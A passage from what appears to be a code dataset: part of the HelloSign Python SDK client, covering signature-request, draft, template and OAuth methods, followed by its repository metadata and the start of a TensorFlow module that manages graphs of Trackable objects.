skip_me_now=False, allow_decline=False, allow_reassign=False,
signing_options=None, allow_ccs=False, attachments=None):
''' Creates a new Draft to be used for embedded requesting
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app used to create the embedded draft.
is_for_embedded_signing (bool, optional): Whether this is also for embedded signing. Defaults to False.
requester_email_address (str): Email address of the requester.
files (list of str): The uploaded file(s) to send for signature.
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
draft_type (str): The type of unclaimed draft to create. Use "send_document" to create a claimable file, and "request_signature" for a claimable signature request. If the type is "request_signature" then signers name and email_address are not optional.
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists using text tags for form_fields_per_document. An item of the list should look like this: `{'name: value'}`
cc_email_addresses (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized JSON data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest)
metadata (dict, optional): Metadata to associate with the draft
use_preexisting_fields (bool): Whether to use preexisting PDF fields
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
allow_ccs (bool, optional): Specifies whether the user is allowed to provide email addresses to CC when sending the request. Defaults to False.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
An UnclaimedDraft object
'''
self._check_required_fields({
'client_id': client_id,
'requester_email_address': requester_email_address,
'draft_type': draft_type
}, [{
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
'requester_email_address': requester_email_address,
'is_for_embedded_signing': is_for_embedded_signing,
'files': files,
'file_urls': file_urls,
'draft_type': draft_type,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'requesting_redirect_url': requesting_redirect_url,
'signers': signers,
'custom_fields': custom_fields,
'cc_email_addresses': cc_email_addresses,
'form_fields_per_document': form_fields_per_document,
'metadata': metadata,
'use_preexisting_fields': use_preexisting_fields,
'use_text_tags': use_text_tags,
'hide_text_tags': hide_text_tags,
'skip_me_now': skip_me_now,
'signing_options': signing_options,
'allow_reassign': allow_reassign,
'allow_decline': allow_decline,
'allow_ccs': allow_ccs,
'attachments': attachments
}
return self._create_unclaimed_draft(**params)
def create_embedded_unclaimed_draft_with_template(self, test_mode=False,
client_id=None, is_for_embedded_signing=False, template_id=None,
template_ids=None, requester_email_address=None, title=None,
subject=None, message=None, signers=None, ccs=None, signing_redirect_url=None,
requesting_redirect_url=None, metadata=None, custom_fields=None,
files=None, file_urls=None, skip_me_now=False, allow_decline=False,
allow_reassign=False, signing_options=None):
''' Creates a new Draft to be used for embedded requesting
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app you're using to create this draft. Visit our embedded page to learn more about this parameter.
template_id (str): The id of the Template to use when creating the Unclaimed Draft. Mutually exclusive with template_ids.
template_ids (list of str): The ids of the Templates to use when creating the Unclaimed Draft. Mutually exclusive with template_id.
requester_email_address (str): The email address of the user that should be designated as the requester of this draft, if the draft type is "request_signature."
title (str, optional): The title you want to assign to the Unclaimed Draft
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
ccs (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
is_for_embedded_signing (bool, optional): The request created from this draft will also be signable in embedded mode if set to True. The default is False.
metadata (dict, optional): Metadata to associate with the draft. Each request can include up to 10 metadata keys, with key names up to 40 characters long and values up to 500 characters long.
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template. An item of the list should look like this: `{'name: value'}`
files (list of str): The uploaded file(s) to append to the Signature Request.
file_urls (list of str): URLs of the file for HelloSign to download to append to the Signature Request. Use either `files` or `file_urls`
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
allow_reassign (bool, optional): Allows signers to reassign their signature requests to other signers if set to True. Defaults to False.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
Returns:
An UnclaimedDraft object
'''
self._check_required_fields({
"client_id": client_id,
"requester_email_address": requester_email_address
}, [{
"template_id": template_id,
"template_ids": template_ids
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
'is_for_embedded_signing': is_for_embedded_signing,
'template_id': template_id,
'template_ids': template_ids,
'title': title,
'subject': subject,
'message': message,
'requester_email_address': requester_email_address,
'signing_redirect_url': signing_redirect_url,
'requesting_redirect_url': requesting_redirect_url,
'signers': signers,
'ccs': ccs,
'metadata': metadata,
'custom_fields': custom_fields,
'files': files,
'file_urls': file_urls,
'skip_me_now': skip_me_now,
'allow_decline': allow_decline,
'allow_reassign': allow_reassign,
'signing_options': signing_options
}
return self._create_embedded_unclaimed_draft_with_template(**params)
@api_resource(UnclaimedDraft)
def unclaimed_draft_edit_and_resend(self, signature_request_id, client_id,
test_mode=False, requesting_redirect_url=None, signing_redirect_url=None,
is_for_embedded_signing=False, requester_email_address=None):
''' Updates a new signature request from an embedded request that can be edited prior to being sent.
Args:
signature_request_id (str): The id of the SignatureRequest to edit and resend
client_id (str): Client id of the app you're using to create this draft.
test_mode (bool, optional): Whether this is a test, the signature request created from this
draft will not be legally binding if set to True. Defaults to False.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
is_for_embedded_signing (bool, optional): The request created from this draft will also be signable in
embedded mode if set to True. The default is False.
requester_email_address (str, optional): The email address of the user that should be designated as the
requester of this draft, if the draft type is "request_signature."
Returns:
A UnclaimedDraft object
'''
self._check_required_fields({
"client_id": client_id
}
)
data = {
'client_id': client_id,
'test_mode': self._boolean(test_mode),
'requesting_redirect_url': requesting_redirect_url,
'signing_redirect_url': signing_redirect_url,
'is_for_embedded_signing': self._boolean(is_for_embedded_signing),
'requester_email_address': requester_email_address
}
data = HSFormat.strip_none_values(data)
request = self._get_request()
return request.post(self.UNCLAIMED_DRAFT_EDIT_AND_RESEND_URL + signature_request_id, data=data)
# ---- OAUTH METHODS -------------------------------
def get_oauth_data(self, code, client_id, client_secret, state):
''' Get Oauth data from HelloSign
Args:
code (str): Code returned by HelloSign for our callback url
client_id (str): Client id of the associated app
client_secret (str): Secret token of the associated app
Returns:
A HSAccessTokenAuth object
'''
request = self._get_request()
response = request.post(self.OAUTH_TOKEN_URL, {
"state": state,
"code": code,
"grant_type": "authorization_code",
"client_id": client_id,
"client_secret": client_secret
})
return HSAccessTokenAuth.from_response(response)
def refresh_access_token(self, refresh_token):
''' Refreshes the current access token.
Gets a new access token, updates client auth and returns it.
Args:
refresh_token (str): Refresh token to use
Returns:
The new access token
'''
request = self._get_request()
response = request.post(self.OAUTH_TOKEN_URL, {
"grant_type": "refresh_token",
"refresh_token": refresh_token
})
self.auth = HSAccessTokenAuth.from_response(response)
return self.auth.access_token
# ---- HELPERS -------------------------------------
def get_last_warnings(self):
''' Return the warnings associated with the last request '''
if self.request:
return self.request.get_warnings()
def _boolean(self, v):
''' Convert a value to a boolean '''
return '1' if (v in (True, 'true', 'True', '1', 1)) else '0'
def _get_request(self, auth=None):
''' Return an http request object
auth: Auth data to use
Returns:
A HSRequest object
'''
self.request = HSRequest(auth or self.auth, self.env)
self.request.response_callback = self.response_callback
return self.request
def _authenticate(self, email_address=None, password=None, api_key=None,
access_token=None, access_token_type=None):
''' Create authentication object to send requests
Args:
email_address (str): Email address of the account to make the requests
password (str): Password of the account used with email address
api_key (str): API Key. You can find your API key in https://app.hellosign.com/home/myAccount/current_tab/integrations#api
access_token (str): OAuth access token
access_token_type (str): Type of OAuth access token
Raises:
NoAuthMethod: If no authentication information found
Returns:
A HTTPBasicAuth or HSAccessTokenAuth object
'''
if access_token_type and access_token:
return HSAccessTokenAuth(access_token, access_token_type)
elif api_key:
return HTTPBasicAuth(api_key, '')
elif email_address and password:
return HTTPBasicAuth(email_address, password)
else:
raise NoAuthMethod("No authentication information found!")
def _check_required_fields(self, fields=None, either_fields=None):
''' Check the values of the fields
If no value found in `fields`, an exception will be raised.
`either_fields` are the fields that one of them must have a value
Raises:
HSException: If no value found in at least one item of`fields`, or
no value found in one of the items of `either_fields`
Returns:
None
'''
for (key, value) in fields.items():
# If value is a dict, one of the fields in the dict is required ->
# exception if all are None
if not value:
raise HSException("Field '%s' is required." % key)
if either_fields is not None:
for field in either_fields:
if not any(field.values()):
raise HSException("One of the following fields is required: %s" % ", ".join(field.keys()))
@api_resource(SignatureRequest)
def _send_signature_request(self, test_mode=False, client_id=None, files=None,
file_urls=None, title=None, subject=None, message=None,
signing_redirect_url=None, signers=None, custom_fields=None,
cc_email_addresses=None, form_fields_per_document=None, use_text_tags=False,
hide_text_tags=False, metadata=None, allow_decline=False, allow_reassign=False,
signing_options=None, is_for_embedded_signing=False, attachments=None):
''' To share the same logic between send_signature_request &
send_signature_request_embedded functions
Args:
test_mode (bool, optional): Whether this is a test, the signature request will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app you're using to create this embedded signature request. Visit the embedded page to learn more about this parameter (https://www.hellosign.com/api/embeddedSigningWalkthrough)
files (list of str): The uploaded file(s) to send for signature
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
title (str, optional): The title you want to assign to the SignatureRequest
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
pin (str, optional): The 4- to 12-character access code that will secure this signer's signature page
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template
cc_email_addresses (list, optional): A list of email addresses that should be CCed
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized JSON data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest)
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
metadata (dict, optional): Metadata to associate with the signature request
allow_decline (bool, optional); Allows signers to decline to sign a document if set to 1. Defaults to 0.
allow_reassign (bool, optional): Allows signers to reassign their signature requests to other signers if set to True. Defaults to False.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
is_for_embedded_signing (bool): send_signature_request and send_signature_request_embedded share the same sending logic. To differenciate the two calls embedded requests are now flagged.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The signer's index whose needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
A SignatureRequest object
'''
# Files
files_payload = HSFormat.format_file_params(files)
# File URLs
file_urls_payload = HSFormat.format_file_url_params(file_urls)
# Signers
signers_payload = HSFormat.format_dict_list(signers, 'signers')
# Custom fields
custom_fields_payload = HSFormat.format_custom_fields(custom_fields)
# Form fields per document
if isinstance(form_fields_per_document, str):
form_fields_payload = form_fields_per_document
else:
form_fields_payload = HSFormat.format_json_data(form_fields_per_document)
# CCs
cc_email_addresses_payload = HSFormat.format_param_list(cc_email_addresses, 'cc_email_addresses')
# Metadata
metadata_payload = HSFormat.format_single_dict(metadata, 'metadata')
# Signing options
signing_options_payload = HSFormat.format_signing_options(signing_options, 'signing_options')
# Attachments
attachments_payload = HSFormat.format_dict_list(attachments, 'attachments')
payload = {
"test_mode": self._boolean(test_mode),
"client_id": client_id,
"title": title,
"subject": subject,
"message": message,
"signing_redirect_url": signing_redirect_url,
"form_fields_per_document": form_fields_payload,
"use_text_tags": self._boolean(use_text_tags),
"hide_text_tags": self._boolean(hide_text_tags),
"allow_decline": self._boolean(allow_decline),
"allow_reassign": self._boolean(allow_reassign),
"signing_options": HSFormat.format_json_data(signing_options)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
url = self.SIGNATURE_REQUEST_CREATE_URL
if is_for_embedded_signing:
url = self.SIGNATURE_REQUEST_CREATE_EMBEDDED_URL
data = {}
data.update(payload)
data.update(signers_payload)
data.update(custom_fields_payload)
data.update(cc_email_addresses_payload)
data.update(file_urls_payload)
data.update(metadata_payload)
data.update(signing_options_payload)
data.update(attachments_payload)
request = self._get_request()
response = request.post(url, data=data, files=files_payload)
return response
@api_resource(SignatureRequest)
def _send_signature_request_with_template(self, test_mode=False, client_id=None,
template_id=None, template_ids=None, title=None, subject=None, message=None,
signing_redirect_url=None, signers=None, ccs=None, custom_fields=None,
metadata=None, allow_decline=False, files=None, file_urls=None, signing_options=None):
''' To share the same logic between send_signature_request_with_template
and send_signature_request_embedded_with_template
Args:
test_mode (bool, optional): Whether this is a test, the signature request will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app you're using to create this embedded signature request. Visit the embedded page to learn more about this parameter (https://app.hellosign.com/api/embeddedSigningWalkthrough)
template_id (str): The id of the Template to use when creating the SignatureRequest. Mutually exclusive with template_ids.
template_ids (list): The ids of the Templates to use when creating the SignatureRequest. Mutually exclusive with template_id.
title (str, optional): The title you want to assign to the SignatureRequest
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
signers (list of dict): A list of signers, which each has the following attributes:
role_name (str): Role the signer is assigned to
name (str): The name of the signer
email_address (str): Email address of the signer
pin (str, optional): The 4- to 12-character access code that will secure this signer's signature page
ccs (list of dict, optional): The email address of the CC filling the role of RoleName. Required when a CC role exists for the Template. Each dict has the following attributes:
role_name (str): CC role name
email_address (str): CC email address
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template. An item of the list should look like this: `{'name: value'}`
metadata (dict, optional): Metadata to associate with the signature request
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
files (list of str): The uploaded file(s) to append to the Signature Request.
file_urls (list of str): URLs of the file for HelloSign to download to append to the Signature Request. Use either `files` or `file_urls`
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
Returns:
A SignatureRequest object
'''
# Signers
signers_payload = HSFormat.format_dict_list(signers, 'signers', 'role_name')
# CCs
ccs_payload = HSFormat.format_dict_list(ccs, 'ccs', 'role_name')
# Custom fields
custom_fields_payload = HSFormat.format_custom_fields(custom_fields)
# Metadata
metadata_payload = HSFormat.format_single_dict(metadata, 'metadata')
# Signing options
signing_options_payload = HSFormat.format_signing_options(signing_options, 'signing_options')
# Template ids
template_ids_payload = {}
if template_ids:
for i in range(len(template_ids)):
template_ids_payload["template_ids[%s]" % i] = template_ids[i]
# Files
files_payload = HSFormat.format_file_params(files)
# File URLs
file_urls_payload = HSFormat.format_file_url_params(file_urls)
payload = {
"test_mode": self._boolean(test_mode),
"client_id": client_id,
"template_id": template_id,
"title": title,
"subject": subject,
"message": message,
"signing_redirect_url": signing_redirect_url,
"allow_decline": self._boolean(allow_decline),
"signing_options": HSFormat.format_json_data(signing_options)
}
# remove attributes with empty value
payload = HSFormat.strip_none_values(payload)
url = self.SIGNATURE_REQUEST_CREATE_WITH_TEMPLATE_URL
if client_id:
url = self.SIGNATURE_REQUEST_CREATE_EMBEDDED_WITH_TEMPLATE_URL
data = payload.copy()
data.update(signers_payload)
data.update(ccs_payload)
data.update(custom_fields_payload)
data.update(metadata_payload)
data.update(signing_options_payload)
data.update(template_ids_payload)
data.update(file_urls_payload)
request = self._get_request()
response = request.post(url, data=data, files=files_payload)
return response
@api_resource(UnclaimedDraft)
def _create_unclaimed_draft(self, test_mode=False, client_id=None,
is_for_embedded_signing=False, requester_email_address=None, files=None,
file_urls=None, draft_type=None, subject=None, message=None, signers=None,
custom_fields=None, cc_email_addresses=None, signing_redirect_url=None,
requesting_redirect_url=None, form_fields_per_document=None, metadata=None,
use_preexisting_fields=False, use_text_tags=False, hide_text_tags=False,
skip_me_now=False, allow_reassign=False, allow_decline=False,
signing_options=None, allow_ccs=False, attachments=None):
''' Creates a new Draft that can be claimed using the claim URL
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app used to create the embedded draft.
is_for_embedded_signing (bool): Whether this is for embedded signing on top of being for embedded requesting.
requester_email_address (str): Email address of the requester when creating a draft for embedded requesting.
files (list of str): The uploaded file(s) to send for signature.
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
draft_type (str): The type of unclaimed draft to create. Use "send_document" to create a claimable file, and "request_signature" for a claimable signature request. If the type is "request_signature" then signers name and email_address are not optional.
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists using text tags or form_fields_per_document. An item of the list should look like this: `{'name: value'}`
cc_email_addresses (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized JSON data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest).
metadata (dict, optional): Metadata to associate with the draft
use_preexisting_fields (bool): Whether to use preexisting PDF fields
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
allow_reassign (bool, optional): Allows signers to reassign their signature requests to other signers if set to True. Defaults to False.
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
allow_ccs (bool, optional): Specifies whether the user is allowed to provide email addresses to CC when sending the request. Defaults to False.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
An UnclaimedDraft object
'''
# Files
files_payload = HSFormat.format_file_params(files)
# Files URLs
file_urls_payload = HSFormat.format_file_url_params(file_urls)
# Signers
signers_payload = {}
if signers:
for (idx, signer) in enumerate(signers):
if draft_type == UnclaimedDraft.UNCLAIMED_DRAFT_REQUEST_SIGNATURE_TYPE:
if "name" not in signer and "email_address" not in signer:
raise HSException("Signer's name and email are required")
signers_payload = HSFormat.format_dict_list(signers, 'signers')
# CCs
cc_email_addresses_payload = HSFormat.format_param_list(cc_email_addresses, 'cc_email_addresses')
# Custom fields
custom_fields_payload = HSFormat.format_custom_fields(custom_fields)
# Form fields per document
if isinstance(form_fields_per_document, str):
form_fields_payload = form_fields_per_document
else:
form_fields_payload = HSFormat.format_json_data(form_fields_per_document)
# Metadata
metadata_payload = HSFormat.format_single_dict(metadata, 'metadata')
# Signing options
signing_options_payload = HSFormat.format_signing_options(signing_options, 'signing_options')
# Attachments
attachments_payload = HSFormat.format_dict_list(attachments, 'attachments')
payload = {
"test_mode": self._boolean(test_mode),
"type": draft_type,
"subject": subject,
"message": message,
"signing_redirect_url": signing_redirect_url,
"form_fields_per_document": form_fields_payload,
"use_preexisting_fields": self._boolean(use_preexisting_fields),
"use_text_tags": self._boolean(use_text_tags),
"hide_text_tags": self._boolean(hide_text_tags),
"skip_me_now": self._boolean(skip_me_now),
"allow_reassign": self._boolean(allow_reassign),
"allow_decline": self._boolean(allow_decline),
"signing_options": HSFormat.format_json_data(signing_options),
"allow_ccs": self._boolean(allow_ccs)
}
url = self.UNCLAIMED_DRAFT_CREATE_URL
if client_id is not None:
payload.update({
'client_id': client_id,
'is_for_embedded_signing': '1' if is_for_embedded_signing else '0',
'requester_email_address': requester_email_address,
'requesting_redirect_url': requesting_redirect_url
})
url = self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_URL
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
data = payload.copy()
data.update(signers_payload)
data.update(custom_fields_payload)
data.update(cc_email_addresses_payload)
data.update(file_urls_payload)
data.update(metadata_payload)
data.update(signing_options_payload)
data.update(attachments_payload)
request = self._get_request()
response = request.post(url, data=data, files=files_payload)
return response
@api_resource(Template)
def _add_remove_user_template(self, url, template_id, account_id=None, email_address=None):
''' Add or Remove user from a Template
We use this function for two tasks because they have the same API call
Args:
template_id (str): The id of the template
account_id (str): ID of the account to add/remove access to/from
email_address (str): The email_address of the account to add/remove access to/from
Raises:
HSException: If no email address or account_id specified
Returns:
A Template object
'''
if not email_address and not account_id:
raise HSException("No email address or account_id specified")
data = {}
if account_id is not None:
data = {
"account_id": account_id
}
else:
data = {
"email_address": email_address
}
request = self._get_request()
response = request.post(url + template_id, data)
return response
@api_resource(Team)
def _add_remove_team_member(self, url, email_address=None, account_id=None):
''' Add or Remove a team member
We use this function for two different tasks because they have the same
API call
Args:
email_address (str): Email address of the Account to add/remove
account_id (str): ID of the Account to add/remove
Returns:
A Team object
'''
if not email_address and not account_id:
raise HSException("No email address or account_id specified")
data = {}
if account_id is not None:
data = {
"account_id": account_id
}
else:
data = {
"email_address": email_address
}
request = self._get_request()
response = request.post(url, data)
return response
@api_resource(Template)
def _create_embedded_template_draft(self, client_id, signer_roles, test_mode=False,
files=None, file_urls=None, title=None, subject=None, message=None,
cc_roles=None, merge_fields=None, skip_me_now=False,
use_preexisting_fields=False, metadata=None, allow_reassign=False, allow_ccs=False, attachments=None):
''' Helper method for creating embedded template drafts.
See public function for params.
'''
url = self.TEMPLATE_CREATE_EMBEDDED_DRAFT_URL
payload = {
'test_mode': self._boolean(test_mode),
'client_id': client_id,
'title': title,
'subject': subject,
'message': message,
'skip_me_now': self._boolean(skip_me_now),
'use_preexisting_fields': self._boolean(use_preexisting_fields),
'allow_reassign': self._boolean(allow_reassign),
'allow_ccs':
self._boolean(allow_ccs)
}
# Prep files
files_payload = HSFormat.format_file_params(files)
file_urls_payload = HSFormat.format_file_url_params(file_urls)
# Prep Signer Roles
signer_roles_payload = HSFormat.format_dict_list(signer_roles, 'signer_roles')
# Prep CCs
ccs_payload = HSFormat.format_param_list(cc_roles, 'cc_roles')
# Prep Merge Fields
merge_fields_payload = {
'merge_fields': json.dumps(merge_fields)
}
# Prep Metadata
metadata_payload = HSFormat.format_single_dict(metadata, 'metadata')
# Attachments
attachments_payload = HSFormat.format_dict_list(attachments, 'attachments')
# Assemble data for sending
data = {}
data.update(payload)
data.update(file_urls_payload)
data.update(signer_roles_payload)
data.update(ccs_payload)
data.update(metadata_payload)
data.update(attachments_payload)
if (merge_fields is not None):
data.update(merge_fields_payload)
data = HSFormat.strip_none_values(data)
request = self._get_request()
response = request.post(url, data=data, files=files_payload)
return response
@api_resource(UnclaimedDraft)
def _create_embedded_unclaimed_draft_with_template(self, test_mode=False,
client_id=None, is_for_embedded_signing=False, template_id=None,
template_ids=None, requester_email_address=None, title=None,
subject=None, message=None, signers=None, ccs=None,
signing_redirect_url=None, requesting_redirect_url=None, metadata=None,
custom_fields=None, files=None, file_urls=None, skip_me_now=False,
allow_decline=False, allow_reassign=False, signing_options=None):
''' Helper method for creating unclaimed drafts from templates
See public function for params.
'''
#single params
payload = {
"test_mode": self._boolean(test_mode),
"client_id": client_id,
"is_for_embedded_signing": self._boolean(is_for_embedded_signing),
"template_id": template_id,
"requester_email_address": requester_email_address,
"title": title,
"subject": subject,
"message": message,
"signing_redirect_url": signing_redirect_url,
"requesting_redirect_url": requesting_redirect_url,
"skip_me_now": self._boolean(skip_me_now),
"allow_decline": self._boolean(allow_decline),
"allow_reassign": self._boolean(allow_reassign),
"signing_options": HSFormat.format_json_data(signing_options)
}
#format multi params
template_ids_payload = HSFormat.format_param_list(template_ids, 'template_ids')
signers_payload = HSFormat.format_dict_list(signers, 'signers', 'role_name')
ccs_payload = HSFormat.format_dict_list(ccs, 'ccs', 'role_name')
metadata_payload = HSFormat.format_single_dict(metadata, 'metadata')
signing_options_payload = HSFormat.format_signing_options(signing_options, 'signing_options')
custom_fields_payload = HSFormat.format_custom_fields(custom_fields)
# Files
files_payload = HSFormat.format_file_params(files)
# File URLs
file_urls_payload = HSFormat.format_file_url_params(file_urls)
#assemble payload
data = {}
data.update(payload)
data.update(template_ids_payload)
data.update(signers_payload)
data.update(ccs_payload)
data.update(metadata_payload)
data.update(signing_options_payload)
data.update(custom_fields_payload)
data.update(file_urls_payload)
data = HSFormat.strip_none_values(data)
#send call
url = self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_WITH_TEMPLATE_URL
request = self._get_request()
response = request.post(url, data=data, files=files_payload)
return response
| {
"content_hash": "5ab5b846c49f06a0e196601f1dc10383",
"timestamp": "",
"source": "github",
"line_count": 2499,
"max_line_length": 331,
"avg_line_length": 42.43817527010804,
"alnum_prop": 0.6282613410275995,
"repo_name": "HelloFax/hellosign-python-sdk",
"id": "bdcdbcdcf78084c97d3cbdc0beb491fcb0d8b4fe",
"size": "106053",
"binary": false,
"copies": "1",
"ref": "refs/heads/v3",
"path": "hellosign_sdk/hsclient.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "220399"
}
],
"symlink_target": ""
} |
"""Manages a graph of Trackable objects."""
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import weakref
from tensorflow.core.protobuf import trackable_object_graph_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.training import optimizer as optimizer_v1
from tensorflow.python.training.saving import saveable_object as saveable_object_lib
from tensorflow.python.training.saving import saveable_object_util
from tensorflow.python.training.tracking import base
from tensorflow.python.training.tracking import object_identity
from tensorflow.python.training.tracking import tracking
_ESCAPE_CHAR = "." # For avoiding conflicts with user-specified names.
# Keyword for identifying that the next bit of a checkpoint variable name is a
# slot name. Checkpoint names for slot variables look like:
#
# <path to variable>/<_OPTIMIZER_SLOTS_NAME>/<path to optimizer>/<slot name>
#
# Where <path to variable> is a full path from the checkpoint root to the
# variable being slotted for.
_OPTIMIZER_SLOTS_NAME = _ESCAPE_CHAR + "OPTIMIZER_SLOT"
# Keyword for separating the path to an object from the name of an
# attribute in checkpoint names. Used like:
# <path to variable>/<_OBJECT_ATTRIBUTES_NAME>/<name of attribute>
_OBJECT_ATTRIBUTES_NAME = _ESCAPE_CHAR + "ATTRIBUTES"
def _escape_local_name(name):
# We need to support slashes in local names for compatibility, since this
# naming scheme is being patched in to things like Layer.add_variable where
# slashes were previously accepted. We also want to use slashes to indicate
# edges traversed to reach the variable, so we escape forward slashes in
# names.
return (name.replace(_ESCAPE_CHAR, _ESCAPE_CHAR + _ESCAPE_CHAR)
.replace(r"/", _ESCAPE_CHAR + "S"))
def _object_prefix_from_path(path_to_root):
return "/".join(
(_escape_local_name(trackable.name)
for trackable in path_to_root))
def _slot_variable_naming_for_optimizer(optimizer_path):
"""Make a function for naming slot variables in an optimizer."""
# Name slot variables:
#
# <variable name>/<_OPTIMIZER_SLOTS_NAME>/<optimizer path>/<slot name>
#
# where <variable name> is exactly the checkpoint name used for the original
# variable, including the path from the checkpoint root and the local name in
# the object which owns it. Note that we only save slot variables if the
# variable it's slotting for is also being saved.
optimizer_identifier = "/%s/%s/" % (_OPTIMIZER_SLOTS_NAME, optimizer_path)
def _name_slot_variable(variable_path, slot_name):
"""With an optimizer specified, name a slot variable."""
return (variable_path
+ optimizer_identifier
+ _escape_local_name(slot_name))
return _name_slot_variable
def _serialize_slot_variables(trackable_objects, node_ids, object_names):
"""Gather and name slot variables."""
non_slot_objects = list(trackable_objects)
slot_variables = object_identity.ObjectIdentityDictionary()
for trackable in non_slot_objects:
if (isinstance(trackable, optimizer_v1.Optimizer)
# TODO(b/110718070): Fix Keras imports.
